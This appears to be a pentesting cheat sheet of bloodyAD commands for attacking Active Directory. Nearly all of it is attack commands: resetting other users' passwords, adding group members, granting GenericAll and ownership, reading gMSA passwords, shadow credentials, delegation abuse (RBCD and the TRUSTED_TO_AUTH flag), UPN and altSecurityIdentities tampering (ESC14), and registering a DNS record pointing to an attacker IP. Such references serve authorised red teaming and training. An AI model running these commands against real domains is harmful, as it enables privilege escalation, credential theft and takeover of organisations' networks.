Skip to content

BloodyAD

Retrieve User Information

  • bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username

Add User To Group

  • bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add

Change Password

  • bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password

Give User GenericAll Rights

  • bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username

WriteOwner

  • bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username

ReadGMSAPassword

  • bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword

Enable a Disabled Account

  • bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE

Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag

  • bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION

Modify UPN

  • bloodyAD --host $dc -d $domain -u $username -p $password set object $old_upn userPrincipalName -v $new_upn Check if it has been modified
  • bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr userPrincipalName

MachineAccountQuota

Enumerate MachineAccountQuota - bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuota Set MachineAccountQuota value to 10 - bloodyAD --host $dc -d $domain -u $username -p $password set object 'DC=dc,DC=dc' ms-DS-MachineAccountQuota -v 10

Modify mail

  • bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v [email protected]

Modify the altSecurityIdentities attribute (ESC14B)

  • bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>[email protected]'

Find Writable Attributes

  • bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail

Shadow Credentials

  • bloodyAD --host $dc -d $domain -u $username -p $password add shadowCredentials $target

WriteSPN

  • bloodyAD --host $dc -d $domain -u $username -p $password set object $target servicePrincipalName -v 'domain/meow'

Find Deleted Objects

  • bloodyAD --host $dc -d $domain -u $username -p $password get writable --include-del

Extended Search Operations

  • bloodyAD --host $dc -d $domain -u $username -p $password get search -h e.g. -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065 to display tombstoned
  • bloodyAD --host $dc -d $domain -u $username -p $password -k get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065

Restore a deleted object

  • bloodyAD --host $dc -d $domain -u $username -p $password -k set restore $user_to_restore

Create a new computer account

  • bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password

Add Resource Based Constrained Delegation

  • bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'

Register a DNS Record

  • bloodyAD --host $dc -d $domain -u $username -p $password add dnsRecord $record_name $attacker_ip

Notes

  • Pass -k to use kerberos authentication
  • You can pass a user hash instead of a password using -p :hash
  • Specify format for '--password' or '-k ' using -f, e.g. -f rc4

Resources